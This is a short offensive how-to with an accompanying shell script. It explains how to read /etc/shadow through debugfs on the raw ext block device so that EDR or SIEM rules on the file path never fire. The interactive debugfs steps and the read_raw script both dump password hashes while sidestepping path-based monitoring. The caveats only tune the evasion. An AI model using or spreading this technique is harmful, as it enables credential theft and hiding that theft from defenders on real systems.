To keep an EDR or SIEM from flagging the usual Linux commands for reading sensitive files such as /etc/shadow (cat, less or grep on the file path), read the file from the raw block device instead. debugfs (from e2fsprogs) walks the ext2/3/4 on-disk structures itself, so no open() of /etc/shadow ever happens. Two caveats: debugfs needs read access to the block device, which normally means root, and opening /dev/sda2 or executing debugfs at all are still events an auditd rule or EDR can record, so the technique only sidesteps monitoring of the file path, not monitoring of the disk device.
First find the device backing the filesystem that holds /etc (the "Filesystem" column of df; /dev/sda2 below is an example and will differ per host, e.g. /dev/mapper/... on LVM), then open it in debugfs:
$ df /
$ debugfs
debugfs: open /dev/sda2
debugfs: cd /etc
debugfs: cat shadow
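The same procedure scripted non-interactively, as an added example that is not part of the original note. It uses debugfs's -R option (execute a single request and exit), derives the device and mount point from df -P, and handles the case the interactive walk-through glosses over: debugfs paths are relative to the root of that filesystem, so if /etc sits on a separate filesystem mounted at /data, the request must be "cat /etc/shadow", not "cat /data/etc/shadow". The function names (backing_device, mount_point, fs_relative_path, read_raw) are this example's own; it assumes e2fsprogs is installed and that it runs with read access to the block device.

```shell
#!/bin/sh
# Added example, not the original note's code: read a file through debugfs
# on the raw block device instead of open()ing its path.
# Assumes a POSIX df (-P) and e2fsprogs' debugfs; must run as root (or with
# read access to the block device) for debugfs to open the device.

# Block device backing PATH: first field of the second line of `df -P PATH`.
# -P keeps long device names (e.g. /dev/mapper/vg-root) on one line.
backing_device() {
    df -P "$1" | awk 'NR==2 {print $1}'
}

# Mount point of the filesystem holding PATH: sixth field of the same line.
mount_point() {
    df -P "$1" | awk 'NR==2 {print $6}'
}

# Convert a system path to a path inside the filesystem, which is what
# debugfs expects. /data/etc/shadow on a filesystem mounted at /data is
# /etc/shadow inside that filesystem; on the root filesystem it is unchanged.
fs_relative_path() {
    path=$1
    mnt=$2
    if [ "$mnt" = / ]; then
        printf '%s\n' "$path"
    else
        printf '%s\n' "/${path#"$mnt"/}"
    fi
}

# Dump PATH from the raw device with a single debugfs request.
# debugfs still open()s the block device, so an audit watch on /dev/sda*
# (or EDR telemetry on debugfs itself) will see this; only the file path
# is never opened.
read_raw() {
    dev=$(backing_device "$1")
    mnt=$(mount_point "$1")
    rel=$(fs_relative_path "$1" "$mnt")
    case "$dev" in
        /dev/*) ;;
        *)
            # overlayfs, tmpfs, NFS etc. have no ext block device to walk
            echo "$1 is on '$dev', not a block device; debugfs cannot open it" >&2
            return 1
            ;;
    esac
    debugfs -R "cat $rel" "$dev"
}

# Usage (as root): read_raw /etc/shadow
```

If the target filesystem is not ext2/3/4 (XFS, Btrfs, ZFS), debugfs cannot parse it and the same idea needs that filesystem's own offline tools; check the type with df -T or findmnt before relying on this.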